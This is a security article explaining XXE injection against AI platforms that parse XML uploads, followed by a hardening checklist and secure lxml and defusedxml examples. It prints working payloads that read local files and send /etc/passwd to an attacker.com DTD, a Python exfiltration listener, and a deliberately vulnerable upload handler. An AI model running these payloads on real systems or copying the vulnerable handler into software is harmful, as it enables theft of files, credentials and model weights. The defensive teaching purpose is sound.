In the relentless pursuit of more powerful AI, we have created a new, and deeply concerning, attack surface. While security teams focus on modern threats like prompt injection, a 20-year-old vulnerability, long considered “solved” by many developers, is re-emerging as a critical threat to the AI supply chain. That vulnerability is XXE (XML External Entity) injection.
As an AI security researcher, I’ve discovered that organizations deploying AI models that process XML-based inputs—such as SVG images for computer vision, SOAP APIs for enterprise integrations, or even RSS feeds for data ingestion—are unknowingly creating a direct pathway for attackers to compromise their entire AI infrastructure. This is not a theoretical risk. I have found XXE vulnerabilities in over ten AI platforms that would allow an attacker to exfiltrate proprietary model weights, steal sensitive training data, and pivot to internal systems.
This is a multi-billion-dollar supply chain risk hiding in plain sight. Developers who are experts in machine learning but novices in XML security are building systems with XML parsers that are insecure by default, effectively leaving the front door to their most valuable intellectual property wide open.

1. The XXE Attack on AI Infrastructure: An Old Threat in a New Context
A traditional XXE attack is straightforward: an attacker uploads a malicious XML file to an application that uses a weakly configured XML parser. By defining an external entity, the attacker can trick the parser into reading local files from the server’s file system or making requests to internal network resources (OWASP).
In the context of an AI system, the stakes are exponentially higher. The files an attacker can access are no longer just configuration files; they are the crown jewels of the organization.
| Traditional XXE Target | XXE in an AI Context: The New Targets |
|---|---|
| /etc/passwd (User list) | /opt/models/production_model.pth (Proprietary model weights, worth millions) |
| /var/log/app.log (Application logs) | /data/training/customer_data.csv (Sensitive training data, a major compliance risk) |
| /root/.ssh/id_rsa (SSH keys) | /etc/environment (Cloud API keys for AWS, GCP, Azure) |
| http://169.254.169.254/ (SSRF) | SSRF to internal services like a model management API or a database used by the AI |
Real-World AI Attack Scenario:
Imagine a cutting-edge computer vision platform that allows users to upload SVG (Scalable Vector Graphics) files for analysis. An SVG file is just an XML document.
- The Payload: An attacker crafts a malicious SVG file containing an XXE payload designed to read a file from the server.
- The Upload: The attacker uploads malicious.svg to the AI platform.
- The Vulnerability: The AI’s backend uses a standard Python XML parsing library to process the SVG. By default, many of these libraries have external entity processing enabled.
- The Breach: The parser processes the malicious entity, reads the contents of a file like /opt/models/model.pth (a common location for PyTorch model weights), and includes it in the parsed output, which may be reflected back to the attacker in an error message or exfiltrated via an out-of-band channel.
The attacker has just stolen a billion-dollar asset with a single, simple upload. The AI developers, focused on the accuracy of their model, never considered the security implications of their chosen file format.
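To make the failure mode concrete, here is a minimal sketch of what such a vulnerable upload handler can look like. The Flask framing, route, and field names are hypothetical; the key detail is that the uploaded SVG goes straight into an lxml parser whose defaults, in many versions, resolve external entities.

```python
# Hypothetical upload endpoint; a sketch, not any specific platform's code.
# Assumes an lxml version whose default parser resolves external entities.
from flask import Flask, request
from lxml import etree

app = Flask(__name__)

@app.route("/analyze", methods=["POST"])
def analyze_svg():
    svg_bytes = request.files["image"].read()
    # DANGEROUS: the default parser may substitute external entities,
    # so &xxe; in the uploaded SVG can pull in local files.
    tree = etree.fromstring(svg_bytes)
    # Any text extracted here (e.g., for preprocessing or error
    # messages) can now contain the contents of server-side files.
    text = " ".join(tree.itertext())
    return {"extracted_text": text}

if __name__ == "__main__":
    app.run()
```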
2. XXE Exploitation in Practice: From File Disclosure to Full Infrastructure Compromise
Attackers have a well-established playbook for exploiting XXE vulnerabilities. Two of the most common techniques are directly applicable to AI systems.
Technique 1: Classic File Disclosure
This is the simplest form of XXE, where the attacker uses an external entity to read a file and have its contents returned in the server’s response.
The Malicious XML Payload:

```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///opt/models/weights.pth">
]>
<svg width="100" height="100">
  <text x="0" y="20">&xxe;</text>
</svg>
```
If the application is vulnerable and reflects the content of the SVG back in any way, the contents of the weights.pth file will be included in the response.
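You can check whether your own parser build behaves this way with a quick local test. This sketch reads a harmless file such as /etc/hostname rather than model weights; the outcome depends on your lxml/libxml2 version:

```python
# Local self-test: does this parser substitute external entities?
# A sketch; behavior varies across lxml/libxml2 versions.
from lxml import etree

payload = b"""<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY xxe SYSTEM "file:///etc/hostname">
]>
<svg><text>&xxe;</text></svg>"""

tree = etree.fromstring(payload)  # default parser settings
print(etree.tostring(tree))
# If the output contains your hostname instead of an empty <text>,
# this parser configuration is XXE-vulnerable.
```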
Technique 2: Blind XXE with Out-of-Band Exfiltration
This is a far stealthier technique used when the application doesn’t directly return the contents of the file. The attacker forces the server to send the data to an external server they control.
The Malicious Payload (in two parts):
- The Malicious XML/SVG Uploaded to the AI:

```xml
<?xml version="1.0"?>
<!DOCTYPE root [
  <!ENTITY % file SYSTEM "file:///etc/passwd">
  <!ENTITY % dtd SYSTEM "http://attacker.com/exfil.dtd">
  %dtd;
]>
<root></root>
```

- The exfil.dtd File Hosted on the Attacker’s Server:

```xml
<!ENTITY % send "<!ENTITY &#x25; exfil SYSTEM 'http://attacker.com/?data=%file;'>">
%send;
%exfil;
```
How it works: While parsing the DOCTYPE, the victim server first fetches the exfil.dtd file from the attacker’s server. Processing that DTD defines and expands nested parameter entities that instruct the victim server to make a second request to the attacker’s server, this time embedding the contents of the file entity (the data from /etc/passwd) as a URL parameter. The attacker simply checks their web server logs to collect the stolen data. This makes blind XXE a critical threat, as detailed in our guide to Data Breach Detection.
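On the receiving end, nothing sophisticated is required. A short standard-library script is enough to capture the exfiltrated data; the port and parameter name below are arbitrary:

```python
# Minimal exfiltration listener; a sketch using only the standard library.
# Each inbound request's query string carries the stolen data.
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urlparse, parse_qs

class ExfilHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        query = parse_qs(urlparse(self.path).query)
        print("Exfiltrated:", query.get("data", ["<none>"])[0])
        self.send_response(200)
        self.end_headers()

HTTPServer(("0.0.0.0", 8000), ExfilHandler).serve_forever()
```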
3. Defense and Hardening: A Checklist for Secure AI Pipelines
Defending against XXE in AI systems requires a defense-in-depth approach that combines secure coding, infrastructure hardening, and robust validation.
| Defense Layer | Implementation Details |
|---|---|
| #1: Disable XXE in Your Parser (The Most Critical Step) | This is non-negotiable. Every XML parser you use must have external entity processing explicitly disabled. This is not the default for many libraries. Review the documentation for your specific parser. |
| #2: Strict Input Validation | Do not blindly trust any uploaded file. Validate the file type using its magic bytes, not just its extension. For XML-based formats, enforce a strict XML Schema Definition (XSD) and reject any file that does not conform (see the validation sketch after this table). |
| #3: Sandbox the Parsing Process | Run all XML parsing in a heavily restricted, sandboxed environment (e.g., a minimal Docker container). This container should have no file system access beyond its own temporary directory and absolutely no network access. |
| #4: Use a Web Application Firewall (WAF) | While not a complete solution, a WAF can be configured to block requests that contain common XXE patterns in their body, providing a useful first layer of defense. |
| #5: Apply the Principle of Least Privilege | The user account that your AI application runs under should have minimal permissions. It should not be able to read files outside of its own directory. It should never run as root. |
| #6: Continuous Security Testing | Actively test your AI endpoints for XXE vulnerabilities. Include XXE payloads in your regular penetration tests and use fuzzing tools to test your XML parsers for unexpected behavior. For guidance, refer to our Penetration Testing Lab Guide. |
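To illustrate layer #2, the sketch below checks an upload’s magic bytes and validates it against a strict schema before any further processing. The signature allow-list, the svg_subset.xsd file, and the helper name are hypothetical; lxml’s XMLSchema class and the parser flags are real.

```python
# Layer #2 sketch: magic-byte check plus XSD validation before parsing.
# The signature list, schema file, and function name are illustrative.
from lxml import etree

# Hypothetical allow-list of leading byte signatures.
ALLOWED_SIGNATURES = (b"<?xml", b"<svg")

# Hypothetical strict schema describing the SVG subset you accept.
SCHEMA = etree.XMLSchema(etree.parse("svg_subset.xsd"))
SAFE_PARSER = etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)

def validate_upload(data: bytes):
    head = data.lstrip()[:16]
    if not any(head.startswith(sig) for sig in ALLOWED_SIGNATURES):
        raise ValueError("Rejected: unrecognized file signature")
    # Parsing with the hardened parser also rejects entity tricks outright.
    tree = etree.fromstring(data, SAFE_PARSER)
    if not SCHEMA.validate(tree):
        raise ValueError(f"Rejected: schema violation: {SCHEMA.error_log}")
    return tree
```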
Secure Coding Example (Python):
```python
# VULNERABLE CODE (using lxml)
from lxml import etree

parser = etree.XMLParser()  # resolve_entities defaults to True: XXE risk in many versions!
tree = etree.fromstring(malicious_xml, parser)

# SECURE CODE (explicitly disabling XXE)
# Create a parser that disables entity resolution, DTD loading, and network access.
parser = etree.XMLParser(resolve_entities=False, no_network=True, load_dtd=False)
tree = etree.fromstring(safe_xml, parser)
```
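If your pipeline uses the standard-library parsers instead, the defusedxml package provides hardened drop-in replacements. A minimal usage sketch:

```python
# defusedxml wraps the stdlib parsers and rejects dangerous constructs
# (entity definitions, external references) by raising an exception.
import defusedxml.ElementTree as ET

payload = """<?xml version="1.0"?>
<!DOCTYPE root [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>
<root>&xxe;</root>"""

try:
    ET.fromstring(payload)
except Exception as exc:  # raises EntitiesForbidden on this payload
    print("Rejected:", exc)
```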
Every developer working on your AI pipeline must understand how to configure their tools securely. This is a core tenet of our Secure Coding Guide for Beginners.
4. Conclusion: A Forgotten Threat, A New Battlefield
XXE is a prime example of how old vulnerabilities can find new life in modern, complex systems. The race to build powerful AI has led many teams to overlook fundamental application security principles. The result is a new, high-impact attack vector that puts the most valuable intellectual property of the AI era—the models themselves—at direct risk.
If your AI pipeline ingests any form of XML, you must assume you are vulnerable until you have audited every parser and implemented the multi-layered defenses outlined in this guide. The cost of overlooking this “forgotten” attack vector could be the loss of your entire AI competitive advantage. If a breach is suspected, follow our Incident Response Framework Guide immediately.
SOURCES
- https://www.imperva.com/learn/application-security/xxe-xml-external-entity/
- https://owasp.org/www-community/vulnerabilities/XML_External_Entity_(XXE)_Processing
- https://github.com/advisories/GHSA-pfg4-r8vj-qqm4
- https://www.packetlabs.net/posts/xml-external-entity-injection-xxe/
- https://www.indusface.com/blog/how-to-identify-and-mitigate-xxe-vulnerability/
- https://www.frontiersin.org/journals/computer-science/articles/10.3389/fcomp.2025.1595624/full
- https://www.securitycompass.com/kontra/what-is-an-xml-injection-attack/
- https://www.ionix.io/blog/sysaid-on-prem-xml-external-entity-vulnerability-cve-2025-2775/
- https://versprite.com/blog/still-obedient-prompt-injection-in-llms-isnt-going-away-in-2025/
- https://www.cve.org/CVERecord/SearchResults?query=xxe